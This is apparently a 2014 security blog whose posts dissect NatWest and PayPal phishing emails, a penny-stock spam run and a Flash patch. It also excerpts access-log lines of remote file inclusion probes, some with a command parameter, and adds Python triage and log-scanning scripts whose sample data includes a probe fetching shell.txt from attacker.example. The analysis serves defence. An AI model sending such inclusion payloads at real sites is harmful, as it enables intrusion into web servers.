Phishing scam targeting NatWest, Royal Bank of Scotland customers

February 23, 2014

I intercepted an email phishing scam today targeting Royal Bank of Scotland customers. It uses the abbreviation NatWest as the sender name and in the logos on the page. NatWest stands for National Westminster Bank.

Analysis

The sender (From) claims to be: "NatWest Credit Card"
The subject is: Dear (They insert your email address here) Credit Card Online Services
The body text begins with:


Notice

Dear (your email address)
Your access to NatWest Credit Card Online Services is locked out..

Because of that, our security team had to suspend your account.

Please use the link below to unlock.:


The link in the message I received pointed to a compromised website named sullivankitchen.com. The fraudsters have created a new folder, or folders, on that website and are using a single index file under /administrator/mobile that forwards victims to another file (start.php) on the same website, which in turn leads to the actual location of the phishing page.

The phishing page has logos and other images and links stolen from the NatWest Royal Bank Of Scotland website. NatWest has obviously failed to apply hotlink protection to its images, some of which are embedded from https locations. Example: https://cardservices.natwest.com/RBSG_Consumer/images/NatWest_alert.png

NB: In the footer, at the bottom of the page, is an out-of-date copyright notice, as follows: © 2005-2009 National Westminster Bank plc. This should raise your antennas, as it is now 2014!

The landing page with all the stolen logos and links has a form field requesting the victim's username, followed by two dead links for those who have forgotten their username or password. Below that is a Login button. This button is also stolen (hotlinked) from the natwest.com website! Inputting any name into the username field, then clicking the Login button, takes you to a file named nw-logon.php, where you are asked to input your banking credentials, as follows:
Internet PIN (4 digits)*
Internet Password*
Email Address*
Email Password*

If you do this, then click on the button labeled Next, your banking username and password, along with your email address and password are sent to the cybercriminals behind this banking fraud. You are then forwarded to the actual NatWest bank website, to fool you into thinking nothing bad has happened. However, it doesn't take a genius to notice the pink-purple box on the upper right, asking you to log in. This is the it's-too-late giveaway that your account login has been successfully stolen, via a phishing scam.

With your NatWest credentials they can empty your bank account in minutes, plus take control of the email address you provided and use it to send spam and scam messages to your contacts list, if any exists.

I don't know who is behind this phishing scam. But, I have traced an interesting IP address almost hidden among the various headers. It is a Ukrainian mail server (mail.paton.kiev.ua), at 91.212.177.7, listed as belonging to: AS49306 ONGOZA Ltd., Ukraine, Kyiv, Yaroslaviv Val, 36-38. Their CIDR is 91.212.177.0/24, which I am adding to my Russian Blocklist.


Brand new pump and dump scam hits email inboxes

February 20, 2014

I was wondering when they'd make a comeback. Well, they're here! I'm referring to the good old pump and dump penny stock scams, promoted by fraudsters via spam email messages.

The last time I saw any of these email scams was briefly in December, 2013. Before that the last serious scam run for penny stocks petered out at the end of the summer, 2013. Each one of those pump and dump scams listed a 4 letter stock symbol with a very low valuation, along with grandiose subjects and body text proclaiming that it was about to explode, or was releasing huge news, etc. Recipients were urged to buy in quickly, in huge quantities, which drove the prices up. As soon as those artificial prices peaked, the fraudsters running the scam sold off all of their shares at a profit, leaving all of the later investors holding the bag.

After disappearing for a few months, the penny stock scam has just returned, today, February 20, 2014. This time around, the stock being pumped up is PRFC. The emails are all using the exact same language and template. All have the subject: Very important information. Please read, although this is likely to change by tomorrow. All are sent from botnetted computers. The goal is the same as before. Scammers have purchased huge blocks of super-cheap penny stocks for PRFC and are now using spam messages to pump them higher. If they succeed, it will be at the expense of the people who are fooled by the new newsletter-style, plain-language format.

However, I did find some humor in this batch of scams. Every one of them so far has been signed at the bottom with this text: "Your favorite friend and only broker :)" But apparently, my favorite friend and only broker has multiple personality disorder and is confused as to who he or she is with any given email. Each email has a different name in the From field! So far, my "only broker" claims to be: Noemi Cooke, Markus Robertson, Jasmine Suarez, Arlene Adkins and Leandro Kinney!

I've said it before and will say it again: "A fool and his money soon will part!" Don't be a fool. Never buy anything spamvertised, especially penny stocks. The game is stacked against you by true con men and women. You will not beat them at their own game. Delete pump and dump messages on sight.

BTW: I have updated my MailWasher Pro spam filters to detect and delete these messages for you, if you are also a registered MailWasher Pro user.


Adobe Flash Player updated to fix 0 day exploit

February 20, 2014

Today, Adobe released an unscheduled update to its Flash Player, the plug-in that nearly every computer and handheld device except Apple iPhones and iPads uses to view videos and animations online. The new releases are version 12.0.0.70 for all Windows and Mac OS X operating systems, version 11.2.202.341 for Linux, and 11.2.202.223 for Solaris.

Adobe strongly recommends that users of Adobe Flash Player 12.0.0.44 and earlier versions for Windows and Macintosh update to Adobe Flash Player 12.0.0.70, and that folks using 11.2.202.336 and earlier versions for Linux update to Adobe Flash Player 11.2.202.341.

You can find out which version of Flash, if any, each of your browsers is running on the Adobe About Flash page. It contains a link to download the newest version of Flash for your browser and any others you may have installed. Firefox, Internet Explorer and Google Chrome all use different builds of Flash: you update a plug-in version for Firefox and an ActiveX version for Internet Explorer, while Google Chrome itself is updated to include new builds of Flash.

Adobe normally releases updated versions of Flash on a monthly cycle, on the second Tuesday of every month, soon after Microsoft pushes out its Patch Tuesday Windows Updates. However, as fate would have it, the Flash exploit patched today is directly linked to Microsoft's Internet Explorer browsers; currently only IE 9 and 10 are affected, and only on particular versions of Windows, from Vista up.

So, Microsoft joined with Adobe to plug their interconnected "zero day" vulnerability, which is being exploited in online attacks against specifically targeted entities. While Microsoft hasn't pushed out an out-of-cycle patch yet, it has published Microsoft Fix it 51007 as a so-called "MSHTML Shim Workaround." Security Advisory 2934088 lists all of the impacted operating systems and IE browsers.

There is a negative impact after installing the Fix it solution above. According to the Microsoft Security Advisory 2934088, "after you install this Fix it solution, you may experience increased memory usage when you use Internet Explorer to browse the web. This behavior occurs until you restart Internet Explorer."

In the event that the effect of the Fix it tool is worse than your perceived risk, you can run Microsoft Fix it 51008 to undo the changes. They really should call these secondary tools "Undo" tools.

Rest assured that Microsoft is working up an official patch that will probably be ready come the next Patch Tuesday, in March, 2014.

N.B.: As I have mentioned before in many of my articles, running your computer as a less privileged user, rather than an administrator, greatly reduces the likelihood or at least the severity of infection from a "drive-by" exploit attack. This is in line with Microsoft's own advice, as found on the security advisory page:

An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.


Beware of emails containing a PayPal Phishing scam attachment

February 20, 2014

Today, I received a suspicious email claiming to come from PayPal, with the subject: "Account Notification" - notifying me that I had to verify my account information - because of a "planned system upgrade." As I suspected, it was a Phishing scam, not only meant to steal one's PayPal credentials, but also your identity.

Here are the most important identifying features of this email scam.

PayPal Phishing Scam Email Contents

Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000

From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):


PayPal Account System Upgrade Verification.

Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.

This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.

Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.

We apologize for any inconvenience, and thank you for your time.

Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.

Copyright © 1999-2014 PayPal. All rights reserved.

My analysis follows.

The first thing an astute PayPal customer should look for in any email communication from the company, is a "salutation" containing their own legal name, or whatever name they used to register their PayPal account (Dear _, Attention _, etc.). This email has no salutation whatsoever!

The next giveaway is the email address in the From field. Although the word "PayPal" is displayed, the actual email address next to it is not even spoofed to read @paypal.com. Rather, the scammers have borrowed an innocent third party's email account and inserted it into both the Return-Path and From fields. This causes bounces and angry replies to go to the person or company whose account was spoofed. We call this a "Joe Job" in spam-fighter-speak.

Those of you who know how to display the incoming headers of email messages would have noticed that the sender was a Comcast customer in Westchester, Pa, who relayed it from a mail server in Brazil. To wit:
"Received: from imta24.westchester.pa.mail.comcast.net (LHLO imta24.westchester.pa.mail.comcast.net)"
"Received: from mail.xx11.com.br ([177.8.168.7])"

The next suspicious item is this sentence: "We have sent you an attachment form through this email. Please download and open it in your web browser." PayPal doesn't do that. If you must fill out a form or update any information, they tell you to log into your PayPal account and go to this or that section and download or update it from the official PayPal website.

Now, about that attached form...

The attached file is a full-fledged html document, complete with images stolen from various PayPal servers. When opened in a browser it closely resembles an official PayPal page. Along the top is a section of button-like links, starting with "My Account," all of which do nothing if clicked. There are however a few scattered actual links to various PayPal pages, just to throw you off balance.

The call to action in this fraud begins under the bold heading "Profile Update", where we find this threatening sentence: "Please complete the form below to update your Profile information and restore your account access." This is meant to get recipients to begin filling in the requested (and "required") details that follow, for fear of losing access to their PayPal accounts.

So, what information do they want you to update? Look no further than the input fields under "Personal Information Profile". Here we find everything needed for identity theft.


Card Holder Name:
Date of Birth:
Mother's Maiden Name:
Social Security Number:
Home Phone Number:

Address Line 1:
Address Line 2:
City:
State:
Zip Code:
Country:

Card Number:
Expiration Date:
Card Verification Number:


At the bottom right of the form is a gold colored button, labeled: "Save Profile." That is the "submit" button that sends all of your personally identifiable information, along with your PayPal credit/debit card details and card verification code, to a domain registered in The Soviet Union. (form name="frm" action="h**p://www.informed.su/Verified.php")

I'll bet you thought that the Soviet Union was long gone. As a political entity, yes. As a legal web domain name, no. Read this:


What is .su?
.su was assigned as the country code top-level domain for the Soviet Union on September 19, 1990. It remains in use today, even though the Soviet Union itself no longer exists, and is administered by the Russian Institute for Public Networks (RIPN, or RosNIIROS in Russian transcription).
(snip)
In Soviet Union the official language is Russian.

As I finished this article, I discovered that the domain "informed.su" has been deactivated, following SpamCop reports from me and other spam fighters (You tried to visit informed.su, which is not loading.).

I pray that none of my readers fell victim to this phishing scam. If you have, please log into your PayPal account and change the password and request a new credit/debit card. You might also want to start monitoring your credit reports for attempts to open new accounts from abroad.
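The checks walked through above (a brand name in the From display name next to a non-PayPal address, a Return-Path pointing at the same borrowed mailbox, the origin relay in the Received chain, the missing salutation, and an attached HTML form with its action URL) can be scripted for triage. This is an added example, not code from the original post; the sample message is constructed from the headers quoted above, with the obfuscated third-party mailbox replaced by a placeholder address and the form's action defanged exactly as the post prints it.

```python
import re
from email import message_from_string
from email.utils import parseaddr

BRAND = "PayPal"
BRAND_DOMAINS = ("paypal.com",)  # where genuine mail and relays for this brand live

# Constructed sample: the headers quoted in the post, a placeholder for the borrowed
# third-party mailbox, and a stub of the attached HTML "form" (action URL defanged).
SAMPLE_MESSAGE = """\
Received: from imta24.westchester.pa.mail.comcast.net (LHLO imta24.westchester.pa.mail.comcast.net)
Received: from mail.xx11.com.br ([177.8.168.7])
 by imta24.westchester.pa.mail.comcast.net with comcast
 id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal <hijacked.mailbox@third-party.example>
Return-Path: <hijacked.mailbox@third-party.example>
Subject: Account Notification
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

PayPal Account System Upgrade Verification. We have sent you an attachment form through this email.
--b1
Content-Type: text/html; name="Verified.html"
Content-Disposition: attachment; filename="Verified.html"

<html><body><form name="frm" action="h**p://www.informed.su/Verified.php"></form></body></html>
--b1--
"""

# "from <host> ([<ip>])" as written by the relay that accepted the message
HOP_RE = re.compile(r"from\s+(?P<host>\S+)(?:\s+\([^)]*?\[(?P<ip>[\d.]+)\])?")

def is_brand_domain(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)

def relay_chain(msg):
    """(host, ip) per Received header, earliest hop (the origin) first."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):  # headers are newest-first
        m = HOP_RE.search(hdr)
        if m:
            hops.append((m.group("host"), m.group("ip")))
    return hops

def plain_text(msg):
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and part.get_content_disposition() != "attachment":
            return part.get_payload(decode=True).decode(errors="replace")
    return ""

def triage(raw):
    """Return the red flags the post walks through, as a list of strings."""
    msg = message_from_string(raw)
    flags = []
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = addr.rpartition("@")[2]
    if BRAND.lower() in name.lower() and not is_brand_domain(from_domain):
        flags.append(f"From display name says {BRAND} but address is @{from_domain}")
    rp_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2]
    if rp_domain == from_domain and not is_brand_domain(rp_domain):
        flags.append("Return-Path is the same borrowed mailbox: bounces hit an innocent party (Joe Job)")
    hops = relay_chain(msg)
    if hops and not is_brand_domain(hops[0][0]):
        flags.append(f"origin relay {hops[0][0]} ({hops[0][1]}) is not a {BRAND} server")
    if not re.match(r"\s*(dear|hello|hi|attention)\b", plain_text(msg), re.I):
        flags.append("no salutation naming the account holder")
    for part in msg.walk():  # an attached HTML form is the post's "attached form" tell
        if part.get_content_disposition() == "attachment" and part.get_content_type() == "text/html":
            html = part.get_payload(decode=True).decode(errors="replace")
            flags.append(f"HTML form attached as {part.get_filename()}")
            flags += [f"attached form submits to {u}" for u in re.findall(r'action="([^"]+)"', html)]
    return flags
```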


Massive server probe attack on 2/16/2014

February 16, 2014

As a concerned web site owner and webmaster I make it a routine to review my daily access logs. I am not only looking at who visited me and from where they were referred, but who was attacking my web site and what probes they were using.

On Sunday, February 16, 2014, I was reading the day's raw access log when I saw an enormous vulnerability probe attack, which encompassed an amazing 2189 individual hack attempts over 12 minutes and 11 seconds. The entire attack came from a compromised dedicated server at 208.115.221.18, which belongs to Limestone Networks and is sub-leased to a Panamanian citizen, who in turn leased the server at that IP address to a company named Towntek.com.

Upon checking out Towntek.com I was greeted by a "default website page", the page that is displayed when web space has been leased but no content has been uploaded to the public web root and/or no index page has been published.

So, what we have here is yet another undeveloped web site on an unsecured web server that has been hacked and is being used to attack other web sites.

Fortunately for me (fortune favors the prepared mind), I made it a point to learn about common attack vectors used to take over web sites and have protected my web sites against the tactics employed by the remote attacker using 208.115.221.18. This attack is most likely part of a botnet that employs hacked web sites and servers to launch attacks against other web sites and individuals browsing them.

I have since notified Limestone Networks about the compromised account. The assigned owner of the hacked site left no contact information.

Excerpts of the attack are shown in my extended content.

Excerpts of the server attack targeting Wizcrafts.net, on 2/16/2014:



208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /=http://www.google.com/humans.txt? HTTP/1.1" 403 329 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?_CONFIG[files][functions_page]=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?show=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
snip

208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:38 -0700] "GET /work/index.php?g_include=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-cache-phase1.php?plugin=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:48 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /wsk/wsk.php?wsk=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:52 -0700] "GET /xarg_corner.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_bottom.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xarg_corner_top.php?xarg=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.google.com/humans.txt?&2093085906=1&995617320=2 HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /xt_counter.php?server_base_dir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yacs/scripts/update_trailer.php?context[path_to_root]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:54 -0700] "GET /yrch/plugins/metasearch/plug.inc.php?path=http://www.google.com/humans.txt? HTTP/1.1" 406 426 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /ytb/cuenta/cuerpo.php?base_archivo=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zipndownload.php?PP_PATH=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"
208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"



The attack lasted over 12 minutes and encompassed 2189 individual lines in my access log. The targets were probed in alphabetical order, ending with items beginning with the letter Z. Every one was tested to see if it could be used to include the remote file named "humans.txt." This type of attack is called a remote file inclusion (RFI) attack.

If you own or manage web sites, check your access logs for similar entries. Mine all gave either a 403, 405, or 406 server response, which means they were fended off. If you see such hack attempts and any show a server 200 response, that means the remote file inclusion was successful and your web server or web site may have been hacked.
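To find this kind of probe in your own logs, the following added example (not code from the original post) parses Apache combined-format lines, flags requests whose query parameters carry a remote URL, and groups them per source address with the time span, the parameter names hit and any probe that received a 2xx. The sample log is constructed from three lines of the excerpt above plus a benign request and one invented probe from a placeholder address (192.0.2.10, attacker.example) that got a 200.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A parameter whose value is a remote URL is the classic RFI probe signature.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)

# Constructed sample: three lines from the post's excerpt, one benign request, and one
# invented probe from a placeholder address that got a 200 (the case to investigate).
SAMPLE_LOG = [
    '208.115.221.18 - - [16/Feb/2014:06:07:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"',
    '208.115.221.18 - - [16/Feb/2014:06:07:47 -0700] "GET /?npage=-1&content_dir=http://www.google.com/humans.txt?%00&cmd=ls HTTP/1.1" 406 426 "-" "-"',
    '198.51.100.7 - - [16/Feb/2014:06:10:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '208.115.221.18 - - [16/Feb/2014:06:19:57 -0700] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS[\'lib\'][\'db\'][\'path\']=http://www.google.com/humans.txt? HTTP/1.1" 405 788 "-" "-"',
    '192.0.2.10 - - [16/Feb/2014:07:00:01 -0700] "GET /gallery/init.php?GALLERY_BASEDIR=http://attacker.example/shell.txt? HTTP/1.1" 200 1024 "-" "-"',
]

def parse_line(line):
    """Split one combined-format line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"], rec["target"] = parts[0], (parts[1] if len(parts) > 1 else "")
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def rfi_params(target):
    """Names of query parameters whose (percent-decoded) value is a remote URL."""
    query = urlsplit(target).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_URL_RE.match(v)]

def is_rfi_probe(target):
    """True if a parameter carries a remote URL, or an '=http://' survives in the
    decoded request (probes like '/=http://...' have no well-formed query at all)."""
    return bool(rfi_params(target)) or bool(re.search(r"=(?:https?|ftp)://", unquote(target), re.I))

def summarize(lines):
    """Per source IP: probe count, first/last time, parameter names hit, and every probe
    answered with a 2xx. Treat a 2xx as a lead, not proof: a static page can answer a
    bogus query too, so check which script actually responded before calling it a hack."""
    report = defaultdict(lambda: {"count": 0, "first": None, "last": None,
                                  "params": set(), "succeeded": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_rfi_probe(rec["target"]):
            continue
        r = report[rec["ip"]]
        r["count"] += 1
        r["first"] = rec["time"] if r["first"] is None else min(r["first"], rec["time"])
        r["last"] = rec["time"] if r["last"] is None else max(r["last"], rec["time"])
        r["params"].update(rfi_params(rec["target"]))
        if 200 <= rec["status"] < 300:
            r["succeeded"].append(rec["target"])
    return dict(report)

def duration_seconds(entry):
    return int((entry["last"] - entry["first"]).total_seconds())

if __name__ == "__main__":
    for ip, r in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {r['count']} RFI probes over {duration_seconds(r)} s, "
              f"params={sorted(r['params'])}, 2xx={r['succeeded']}")
```

Run it against a real log with `summarize(open("access.log"))`; the three excerpt lines alone already reproduce the post's 12 minute 11 second (731 s) window for 208.115.221.18.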


About the author
Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.

This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type